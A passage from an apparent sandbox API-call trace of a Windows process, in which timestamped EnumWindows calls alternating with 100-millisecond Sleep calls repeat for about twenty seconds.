lParam=0x540000) [0261.356] Sleep (dwMilliseconds=0x64) [0261.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.464] Sleep (dwMilliseconds=0x64) [0261.621] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.622] Sleep (dwMilliseconds=0x64) [0261.763] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.764] Sleep (dwMilliseconds=0x64) [0261.891] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.891] Sleep (dwMilliseconds=0x64) [0261.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0261.952] Sleep (dwMilliseconds=0x64) [0262.027] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.027] Sleep (dwMilliseconds=0x64) [0262.087] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.088] Sleep (dwMilliseconds=0x64) [0262.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.275] Sleep (dwMilliseconds=0x64) [0262.407] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.407] Sleep (dwMilliseconds=0x64) [0262.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.482] Sleep (dwMilliseconds=0x64) [0262.571] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.571] Sleep (dwMilliseconds=0x64) [0262.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.732] Sleep (dwMilliseconds=0x64) [0262.950] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0262.951] Sleep (dwMilliseconds=0x64) [0263.199] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.217] Sleep (dwMilliseconds=0x64) [0263.320] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.321] Sleep (dwMilliseconds=0x64) [0263.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.434] Sleep (dwMilliseconds=0x64) [0263.522] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.522] Sleep (dwMilliseconds=0x64) [0263.737] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.737] Sleep (dwMilliseconds=0x64) [0263.962] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0263.963] Sleep (dwMilliseconds=0x64) [0264.098] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.098] Sleep (dwMilliseconds=0x64) [0264.202] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.202] Sleep (dwMilliseconds=0x64) [0264.251] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.251] Sleep (dwMilliseconds=0x64) [0264.358] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.359] Sleep (dwMilliseconds=0x64) [0264.420] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.420] Sleep (dwMilliseconds=0x64) [0264.461] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.465] Sleep (dwMilliseconds=0x64) [0264.515] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.516] Sleep (dwMilliseconds=0x64) [0264.548] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.549] Sleep (dwMilliseconds=0x64) [0264.591] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.592] Sleep (dwMilliseconds=0x64) [0264.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.652] Sleep (dwMilliseconds=0x64) [0264.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.780] Sleep (dwMilliseconds=0x64) [0264.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.858] Sleep (dwMilliseconds=0x64) [0264.953] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0264.953] Sleep (dwMilliseconds=0x64) [0265.035] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.035] Sleep (dwMilliseconds=0x64) [0265.054] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.055] Sleep (dwMilliseconds=0x64) [0265.057] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.058] Sleep (dwMilliseconds=0x64) [0265.094] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.094] Sleep (dwMilliseconds=0x64) [0265.141] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.142] Sleep (dwMilliseconds=0x64) [0265.221] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.221] Sleep (dwMilliseconds=0x64) [0265.283] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.284] Sleep (dwMilliseconds=0x64) [0265.343] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.343] Sleep (dwMilliseconds=0x64) [0265.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.433] Sleep (dwMilliseconds=0x64) [0265.575] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.576] Sleep (dwMilliseconds=0x64) [0265.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.655] Sleep (dwMilliseconds=0x64) [0265.702] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.703] Sleep (dwMilliseconds=0x64) [0265.760] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.761] Sleep (dwMilliseconds=0x64) [0265.856] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.856] Sleep (dwMilliseconds=0x64) [0265.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0265.936] Sleep (dwMilliseconds=0x64) [0266.082] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.082] Sleep (dwMilliseconds=0x64) [0266.155] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.156] Sleep (dwMilliseconds=0x64) [0266.203] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.203] Sleep (dwMilliseconds=0x64) [0266.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.249] Sleep (dwMilliseconds=0x64) [0266.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.296] Sleep (dwMilliseconds=0x64) [0266.318] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.318] Sleep (dwMilliseconds=0x64) [0266.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.324] Sleep (dwMilliseconds=0x64) [0266.346] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.346] Sleep (dwMilliseconds=0x64) [0266.418] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.419] Sleep (dwMilliseconds=0x64) [0266.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.481] Sleep (dwMilliseconds=0x64) [0266.543] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.543] Sleep (dwMilliseconds=0x64) [0266.636] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.637] Sleep (dwMilliseconds=0x64) [0266.749] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.749] Sleep (dwMilliseconds=0x64) [0266.791] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.791] Sleep (dwMilliseconds=0x64) [0266.858] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.859] Sleep (dwMilliseconds=0x64) [0266.940] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.941] Sleep (dwMilliseconds=0x64) [0266.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0266.983] Sleep (dwMilliseconds=0x64) [0267.044] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.045] Sleep (dwMilliseconds=0x64) [0267.141] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.141] Sleep (dwMilliseconds=0x64) [0267.274] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.275] Sleep (dwMilliseconds=0x64) [0267.351] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.352] Sleep (dwMilliseconds=0x64) [0267.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.404] Sleep (dwMilliseconds=0x64) [0267.465] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.465] Sleep (dwMilliseconds=0x64) [0267.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.574] Sleep (dwMilliseconds=0x64) [0267.653] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.653] Sleep (dwMilliseconds=0x64) [0267.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.766] Sleep (dwMilliseconds=0x64) [0267.835] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.835] Sleep (dwMilliseconds=0x64) [0267.962] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0267.963] Sleep (dwMilliseconds=0x64) [0268.010] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.011] Sleep (dwMilliseconds=0x64) [0268.076] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.077] Sleep (dwMilliseconds=0x64) [0268.103] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.104] Sleep (dwMilliseconds=0x64) [0268.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.155] Sleep (dwMilliseconds=0x64) [0268.221] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.222] Sleep (dwMilliseconds=0x64) [0268.284] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.284] Sleep (dwMilliseconds=0x64) [0268.333] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.334] Sleep (dwMilliseconds=0x64) [0268.444] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.444] Sleep (dwMilliseconds=0x64) [0268.502] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.503] Sleep (dwMilliseconds=0x64) [0268.583] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.583] Sleep (dwMilliseconds=0x64) [0268.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.626] Sleep (dwMilliseconds=0x64) [0268.640] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.640] Sleep (dwMilliseconds=0x64) [0268.655] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.656] Sleep (dwMilliseconds=0x64) [0268.751] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.752] Sleep (dwMilliseconds=0x64) [0268.904] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0268.904] Sleep (dwMilliseconds=0x64) [0269.080] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.080] Sleep (dwMilliseconds=0x64) [0269.103] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.105] Sleep (dwMilliseconds=0x64) [0269.168] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.168] Sleep (dwMilliseconds=0x64) [0269.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.246] Sleep (dwMilliseconds=0x64) [0269.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.433] Sleep (dwMilliseconds=0x64) [0269.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.670] Sleep (dwMilliseconds=0x64) [0269.876] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0269.877] Sleep (dwMilliseconds=0x64) [0270.036] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.037] Sleep (dwMilliseconds=0x64) [0270.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.138] Sleep (dwMilliseconds=0x64) [0270.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.281] Sleep (dwMilliseconds=0x64) [0270.419] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.419] Sleep (dwMilliseconds=0x64) [0270.484] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.485] Sleep (dwMilliseconds=0x64) [0270.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.513] Sleep (dwMilliseconds=0x64) [0270.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.608] Sleep (dwMilliseconds=0x64) [0270.702] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.702] Sleep (dwMilliseconds=0x64) [0270.788] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.789] Sleep (dwMilliseconds=0x64) [0270.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.878] Sleep (dwMilliseconds=0x64) [0270.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0270.952] Sleep (dwMilliseconds=0x64) [0271.039] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.039] Sleep (dwMilliseconds=0x64) [0271.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.093] Sleep (dwMilliseconds=0x64) [0271.119] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.119] Sleep (dwMilliseconds=0x64) [0271.203] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.203] Sleep (dwMilliseconds=0x64) [0271.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.296] Sleep (dwMilliseconds=0x64) [0271.390] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.390] Sleep (dwMilliseconds=0x64) [0271.449] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.453] Sleep (dwMilliseconds=0x64) [0271.546] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.546] Sleep (dwMilliseconds=0x64) [0271.640] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.641] Sleep (dwMilliseconds=0x64) [0271.702] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.702] Sleep (dwMilliseconds=0x64) [0271.750] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.750] Sleep (dwMilliseconds=0x64) [0271.873] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.874] Sleep (dwMilliseconds=0x64) [0271.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0271.983] Sleep (dwMilliseconds=0x64) [0272.078] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0272.079] Sleep (dwMilliseconds=0x64) [0272.169] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0272.170] Sleep (dwMilliseconds=0x64) [0272.515] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0272.516] Sleep (dwMilliseconds=0x64) [0272.728] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0272.729] Sleep (dwMilliseconds=0x64) [0272.889] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0272.890] Sleep (dwMilliseconds=0x64) [0273.029] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.029] Sleep (dwMilliseconds=0x64) [0273.172] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.173] Sleep (dwMilliseconds=0x64) [0273.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.262] Sleep (dwMilliseconds=0x64) [0273.342] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.342] Sleep (dwMilliseconds=0x64) [0273.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.390] Sleep (dwMilliseconds=0x64) [0273.424] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.424] Sleep (dwMilliseconds=0x64) [0273.438] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.438] Sleep (dwMilliseconds=0x64) [0273.452] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.452] Sleep (dwMilliseconds=0x64) [0273.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.546] Sleep (dwMilliseconds=0x64) [0273.628] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.629] Sleep (dwMilliseconds=0x64) [0273.697] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.698] Sleep (dwMilliseconds=0x64) [0273.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.796] Sleep (dwMilliseconds=0x64) [0273.974] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0273.975] Sleep (dwMilliseconds=0x64) [0274.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.031] Sleep (dwMilliseconds=0x64) [0274.122] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.123] Sleep (dwMilliseconds=0x64) [0274.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.186] Sleep (dwMilliseconds=0x64) [0274.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.281] Sleep (dwMilliseconds=0x64) [0274.374] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.375] Sleep (dwMilliseconds=0x64) [0274.430] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.431] Sleep (dwMilliseconds=0x64) [0274.530] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.530] Sleep (dwMilliseconds=0x64) [0274.588] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.589] Sleep (dwMilliseconds=0x64) [0274.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.611] Sleep (dwMilliseconds=0x64) [0274.666] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.667] Sleep (dwMilliseconds=0x64) [0274.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.745] Sleep (dwMilliseconds=0x64) [0274.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.811] Sleep (dwMilliseconds=0x64) [0274.920] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0274.921] Sleep (dwMilliseconds=0x64) [0275.053] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.053] Sleep (dwMilliseconds=0x64) [0275.113] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.114] Sleep (dwMilliseconds=0x64) [0275.159] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.159] Sleep (dwMilliseconds=0x64) [0275.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.170] Sleep (dwMilliseconds=0x64) [0275.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.218] Sleep (dwMilliseconds=0x64) [0275.306] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.306] Sleep (dwMilliseconds=0x64) [0275.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.435] Sleep (dwMilliseconds=0x64) [0275.518] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.519] Sleep (dwMilliseconds=0x64) [0275.562] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.562] Sleep (dwMilliseconds=0x64) [0275.641] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.642] Sleep (dwMilliseconds=0x64) [0275.700] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.700] Sleep (dwMilliseconds=0x64) [0275.724] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.725] Sleep (dwMilliseconds=0x64) [0275.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.729] Sleep (dwMilliseconds=0x64) [0275.747] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.748] Sleep (dwMilliseconds=0x64) [0275.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.797] Sleep (dwMilliseconds=0x64) [0275.822] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.822] Sleep (dwMilliseconds=0x64) [0275.889] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.890] Sleep (dwMilliseconds=0x64) [0275.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0275.982] Sleep (dwMilliseconds=0x64) [0276.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.046] Sleep (dwMilliseconds=0x64) [0276.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.093] Sleep (dwMilliseconds=0x64) [0276.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.218] Sleep (dwMilliseconds=0x64) [0276.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.265] Sleep (dwMilliseconds=0x64) [0276.317] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.318] Sleep (dwMilliseconds=0x64) [0276.360] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.360] Sleep (dwMilliseconds=0x64) [0276.377] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.377] Sleep (dwMilliseconds=0x64) [0276.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.417] Sleep (dwMilliseconds=0x64) [0276.506] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.506] Sleep (dwMilliseconds=0x64) [0276.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.558] Sleep (dwMilliseconds=0x64) [0276.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.606] Sleep (dwMilliseconds=0x64) [0276.685] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.685] Sleep (dwMilliseconds=0x64) [0276.742] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.743] Sleep (dwMilliseconds=0x64) [0276.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.811] Sleep (dwMilliseconds=0x64) [0276.868] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.868] Sleep (dwMilliseconds=0x64) [0276.914] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.915] Sleep (dwMilliseconds=0x64) [0276.956] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0276.957] Sleep (dwMilliseconds=0x64) [0277.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.047] Sleep (dwMilliseconds=0x64) [0277.097] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.098] Sleep (dwMilliseconds=0x64) [0277.146] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.146] Sleep (dwMilliseconds=0x64) [0277.192] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.195] Sleep (dwMilliseconds=0x64) [0277.237] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.238] Sleep (dwMilliseconds=0x64) [0277.333] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.333] Sleep (dwMilliseconds=0x64) [0277.379] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.380] Sleep (dwMilliseconds=0x64) [0277.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.435] Sleep (dwMilliseconds=0x64) [0277.474] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.475] Sleep (dwMilliseconds=0x64) [0277.556] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.557] Sleep (dwMilliseconds=0x64) [0277.594] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.594] Sleep (dwMilliseconds=0x64) [0277.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.607] Sleep (dwMilliseconds=0x64) [0277.974] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0277.975] Sleep (dwMilliseconds=0x64) [0278.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.074] Sleep (dwMilliseconds=0x64) [0278.202] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.203] Sleep (dwMilliseconds=0x64) [0278.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.249] Sleep (dwMilliseconds=0x64) [0278.338] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.342] Sleep (dwMilliseconds=0x64) [0278.424] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.424] Sleep (dwMilliseconds=0x64) [0278.466] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.467] Sleep (dwMilliseconds=0x64) [0278.521] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.521] Sleep (dwMilliseconds=0x64) [0278.575] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.576] Sleep (dwMilliseconds=0x64) [0278.644] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.644] Sleep (dwMilliseconds=0x64) [0278.739] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.740] Sleep (dwMilliseconds=0x64) [0278.783] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.783] Sleep (dwMilliseconds=0x64) [0278.833] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.834] Sleep (dwMilliseconds=0x64) [0278.864] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.864] Sleep (dwMilliseconds=0x64) [0278.954] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0278.957] Sleep (dwMilliseconds=0x64) [0279.001] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.001] Sleep (dwMilliseconds=0x64) [0279.061] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.062] Sleep (dwMilliseconds=0x64) [0279.114] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.114] Sleep (dwMilliseconds=0x64) [0279.129] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.130] Sleep (dwMilliseconds=0x64) [0279.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.154] Sleep (dwMilliseconds=0x64) [0279.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.202] Sleep (dwMilliseconds=0x64) [0279.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.281] Sleep (dwMilliseconds=0x64) [0279.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.530] Sleep (dwMilliseconds=0x64) [0279.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.732] Sleep (dwMilliseconds=0x64) [0279.996] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0279.997] Sleep (dwMilliseconds=0x64) [0280.137] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.137] Sleep (dwMilliseconds=0x64) [0280.361] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.362] Sleep (dwMilliseconds=0x64) [0280.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.452] Sleep (dwMilliseconds=0x64) [0280.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.561] Sleep (dwMilliseconds=0x64) [0280.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.652] Sleep (dwMilliseconds=0x64) [0280.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.715] Sleep (dwMilliseconds=0x64) [0280.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.780] Sleep (dwMilliseconds=0x64) [0280.872] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.873] Sleep (dwMilliseconds=0x64) [0280.892] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.892] Sleep (dwMilliseconds=0x64) [0280.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.902] Sleep 